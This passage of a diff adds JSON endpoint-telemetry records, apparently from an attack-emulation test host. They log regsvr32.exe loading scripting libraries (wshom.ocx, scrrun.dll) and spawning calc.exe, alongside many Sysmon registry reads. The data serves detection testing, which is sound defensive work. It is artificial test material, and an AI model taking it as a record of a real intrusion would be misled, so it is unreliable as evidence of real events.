+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
+ "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wshom.ocx", + "image_path": "C:\\Windows\\System32\\wshom.ocx", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240430000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "\"C:\\Windows\\System32\\calc.exe\" ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "regsvr32.exe", + "parent_process_path": "C:\\Windows\\System32\\regsvr32.exe", + "pid": 4724, + "ppid": 2012, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "subtype": "create", + "timestamp": 131883573241160000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}", + "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", + "registry_value": "418A073AA3BC3475", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "scrrun.dll", + "image_path": "C:\\Windows\\System32\\scrrun.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240430000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, 
+ "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": 
"{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": 
"C:\\Windows\\System32\\msvcp_win.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "MpClient.dll", + "image_path": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.1810.5-0\\MpClient.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + 
